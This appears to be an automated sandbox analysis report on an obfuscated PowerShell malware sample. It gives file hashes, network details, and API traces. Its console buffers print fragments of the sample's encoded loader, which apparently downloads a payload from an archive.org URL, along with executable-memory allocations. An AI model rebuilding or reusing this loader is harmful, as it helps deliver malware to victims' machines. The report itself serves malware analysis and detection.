popup
Summary | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

file_iet2mvl3.idw.txt.ps1

Generic Malware Antivirus
  1. Resubmit sample
Category Machine Started Completed
FILE s1_win7_x6402 July 4, 2024, 9:53 a.m. July 4, 2024, 9:55 a.m.
Size 14.1KB
Type UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
MD5 35fc934c763040e9f35474eacffe3e34
SHA256 7c60899a1bf87d57d370e8a6c1e0d89390cfb4644978fb9261ad5dfe31b71f12
CRC32 0FDD527F
ssdeep 384:MZ8N5DVe6BLQBLOrvy0zYd+mg2GFSE3jvBuH+ciRgHVpPgRlVHztsRpZ2GG+V+Rs:fVXaOrvVYgH2GAE3jvB9voV8HQaZy
Yara None matched

Name Response Post-Analysis Lookup
No hosts contacted.
IP Address Status Action
164.124.101.2 Active Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

WriteConsoleW

 buffer: Ampersand not allowed. The & operator is reserved for future use; use "&" to pa
console_handle: 0x00000023
1 1 0

WriteConsoleW

 buffer: ss ampersand as a string.
console_handle: 0x0000002f
1 1 0

WriteConsoleW

 buffer: At C:\Users\test22\AppData\Local\Temp\file_iet2mvl3.idw.txt.ps1:4 char:24
console_handle: 0x0000003b
1 1 0

WriteConsoleW

 buffer: + villarinho = "" & <<<< escandalizador & cirigo & escandalizador & "gB1
console_handle: 0x00000047
1 1 0

WriteConsoleW

 buffer: DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8
console_handle: 0x00000053
1 1 0

WriteConsoleW

 buffer: DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreH
console_handle: 0x0000005f
1 1 0

WriteConsoleW

 buffer: MDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbD
console_handle: 0x0000006b
1 1 0

WriteConsoleW

 buffer: gTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4D
console_handle: 0x00000077
1 1 0

WriteConsoleW

 buffer: gTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTre" & escandalizador & cirigo & escan
console_handle: 0x00000083
1 1 0

WriteConsoleW

 buffer: dalizador & "QBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgT
console_handle: 0x0000008f
1 1 0

WriteConsoleW

 buffer: reE4DgTre" & escandalizador & cirigo & escandalizador & "QB3DgTreC0DgTreTwBiDgT
console_handle: 0x0000009b
1 1 0

WriteConsoleW

 buffer: reGoDgTre" & escandalizador & cirigo & escandalizador & "QBjDgTreHQDgTreIDgTreB
console_handle: 0x000000a7
1 1 0

WriteConsoleW

 buffer: TDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTre" & escandalizador & cirigo &
console_handle: 0x000000b3
1 1 0

WriteConsoleW

 buffer: escandalizador & "QB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTre" & escandaliz
console_handle: 0x000000bf
1 1 0

WriteConsoleW

 buffer: ador & cirigo & escandalizador & "QBuDgTreHQDgTreOwDgTregDgTreCQDgTre" & escand
console_handle: 0x000000cb
1 1 0

WriteConsoleW

 buffer: alizador & cirigo & escandalizador & "DgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDg
console_handle: 0x000000d7
1 1 0

WriteConsoleW

 buffer: TreGUDgTre" & escandalizador & cirigo & escandalizador & "DgTreBEDgTreGEDgTredD
console_handle: 0x000000e3
1 1 0

WriteConsoleW

 buffer: gTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgT
console_handle: 0x000000ef
1 1 0

WriteConsoleW

 buffer: rekDgTreHMDgTreaDgTreB1DgTreGYDgTre" & escandalizador & cirigo & escandalizador
console_handle: 0x000000fb
1 1 0

WriteConsoleW

 buffer: & "gBsDgTreGUDgTre" & escandalizador & cirigo & escandalizador & "DgTreBMDgTre
console_handle: 0x00000107
1 1 0

WriteConsoleW

 buffer: GkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTr
console_handle: 0x00000113
1 1 0

WriteConsoleW

 buffer: eHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTr
console_handle: 0x0000011f
1 1 0

WriteConsoleW

 buffer: ebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebg
console_handle: 0x0000012b
1 1 0

WriteConsoleW

 buffer: BrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTre" & e
console_handle: 0x00000137
1 1 0

WriteConsoleW

 buffer: scandalizador & cirigo & escandalizador & "gBvDgTreHIDgTre" & escandalizador &
console_handle: 0x00000143
1 1 0

WriteConsoleW

 buffer: cirigo & escandalizador & "QBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTre
console_handle: 0x0000014f
1 1 0

WriteConsoleW

 buffer: GkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYD
console_handle: 0x0000015b
1 1 0

WriteConsoleW

 buffer: gTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTre
console_handle: 0x00000167
1 1 0

WriteConsoleW

 buffer: DgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreG
console_handle: 0x00000173
1 1 0

WriteConsoleW

 buffer: wDgTrebwBhDgTreGQDgTre" & escandalizador & cirigo & escandalizador & "QBkDgTreE
console_handle: 0x0000017f
1 1 0

WriteConsoleW

 buffer: QDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTre" & escan
console_handle: 0x0000018b
1 1 0

WriteConsoleW

 buffer: dalizador & cirigo & escandalizador & "QBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0D
console_handle: 0x00000197
1 1 0

WriteConsoleW

 buffer: gTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTre
console_handle: 0x000001a3
1 1 0

WriteConsoleW

 buffer: KDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTr
console_handle: 0x000001af
1 1 0

WriteConsoleW

 buffer: edDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgT
console_handle: 0x000001bb
1 1 0

WriteConsoleW

 buffer: redQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTre" & escandalizado
console_handle: 0x000001c7
1 1 0

WriteConsoleW

 buffer: r & cirigo & escandalizador & "QB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTre
console_handle: 0x000001d3
1 1 0

WriteConsoleW

 buffer: G8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTre" & escandalizador & cirigo & escandaliz
console_handle: 0x000001df
1 1 0

WriteConsoleW

 buffer: ador & "QBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwD
console_handle: 0x000001eb
1 1 0

WriteConsoleW

 buffer: gTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTr
console_handle: 0x000001f7
1 1 0

WriteConsoleW

 buffer: edDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTreaQBhDgTreDgDgTreMDgTreDgTrezDgTreDQDgT
console_handle: 0x00000203
1 1 0

WriteConsoleW

 buffer: reMDgTreDgTre1DgTreC4DgTredQBzDgTreC4DgTreYQByDgTreGMDgTreaDgTreBpDgTreHYDgTre"
console_handle: 0x0000020f
1 1 0

WriteConsoleW

 buffer: & escandalizador & cirigo & escandalizador & "QDgTreuDgTreG8DgTrecgBnDgTreC8Dg
console_handle: 0x0000021b
1 1 0

WriteConsoleW

 buffer: TreMQDgTre2DgTreC8DgTreaQB0DgTreGUDgTrebQBzDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTr
console_handle: 0x00000227
1 1 0

WriteConsoleW

 buffer: eG0DgTreYQBnDgTreGUDgTreXwDgTreyDgTreDDgTreDgTreMgDgTre0DgTreDDgTreDgTreNgDgTre
console_handle: 0x00000233
1 1 0

WriteConsoleW

 buffer: vDgTreG4DgTre" & escandalizador & cirigo & escandalizador & "QB3DgTreF8DgTreaQB
console_handle: 0x0000023f
1 1 0

WriteConsoleW

 buffer: tDgTreGEDgTre" & escandalizador & cirigo & escandalizador & "wBlDgTreC4DgTreagB
console_handle: 0x0000024b
1 1 0

WriteConsoleW

 buffer: wDgTreGcDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTr
console_handle: 0x00000257
1 1 0

WriteConsoleW

 buffer: evDgTreC8DgTreaQBhDgTreDgDgTreMDgTreDgTrezDgTreDQDgTreMDgTreDgTre1DgTreC4DgTred
console_handle: 0x00000263
1 1 0

WriteConsoleW

 buffer: QBzDgTreC4DgTreYQByDgTreGMDgTreaDgTreBpDgTreHYDgTre" & escandalizador & cirigo
console_handle: 0x0000026f
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002fcc40
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002fcc40
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0027d860
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0027d860
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

 process_identifier: 3048
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0272b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 3048
region_size: 2293760
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x062a0000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 3048
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x06490000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 3048
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x06491000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 3048
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x06492000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 3048
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x06493000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 3048
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x06494000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 3048
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x06495000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 3048
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x06496000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 3048
region_size: 16384
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x06497000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 3048
region_size: 69632
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0649b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 3048
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x064ac000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 3048
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x064ad000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 3048
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0273f000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 3048
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02709000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 3048
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x058b0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 3048
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x058b2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 3048
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x058b3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0